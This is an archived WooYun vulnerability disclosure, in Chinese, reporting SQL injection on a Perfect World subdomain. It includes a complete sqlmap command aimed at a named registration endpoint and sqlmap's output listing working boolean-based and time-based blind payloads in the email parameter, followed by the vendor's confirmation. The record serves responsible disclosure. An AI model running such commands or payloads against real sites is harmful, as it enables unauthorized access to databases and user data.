乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-12: 细节已通知厂商并且等待厂商处理中 2015-01-13: 厂商已经确认,细节仅向厂商公开 2015-01-23: 细节向核心白帽子及相关领域专家公开 2015-02-02: 细节向普通白帽子公开 2015-02-12: 细节向实习白帽子公开 2015-02-26: 细节向公众公开
完美世界分站存在SQL注入
[17:30:21] [INFO] retrieved: [email protected].
sqlmap -u "http://edm.wanmei.com/system/out/register_do.php" --data="address=3137%20Laguna%20Street&button_id=&city_id=010&client_name=vamffxue&email_address=*&fax=317-317-3137&file_name=&max_day=17&max_month=7&msn=sample%40email.tst&postal_code=94102&province_id=P0000001&qq=1&short_name=vamffxue&system_flag=&tel=555-666-0606&user_name=vamffxue&website=http://www.acunetix.com" --dbms=MySQL --risk=3 --level=5 --current-user
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: address=3137 Laguna Street&button_id=&city_id=010&client_name=vamffxue&email_address=' AND 5933=5933 AND 'wdFR'='wdFR&fax=317-317-3137&file_name=&max_day=17&max_month=7&[email protected]&postal_code=94102&province_id=P0000001&qq=1&short_name=vamffxue&system_flag=&tel=555-666-0606&user_name=vamffxue&website=http://www.acunetix.com Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: address=3137 Laguna Street&button_id=&city_id=010&client_name=vamffxue&email_address=' AND SLEEP(5) AND 'Saam'='Saam&fax=317-317-3137&file_name=&max_day=17&max_month=7&[email protected]&postal_code=94102&province_id=P0000001&qq=1&short_name=vamffxue&system_flag=&tel=555-666-0606&user_name=vamffxue&website=http://www.acunetix.com---
危害等级:高
漏洞Rank:10
确认时间:2015-01-13 10:19
感谢洞主对完美世界的关注,我们会尽快修补漏洞。
暂无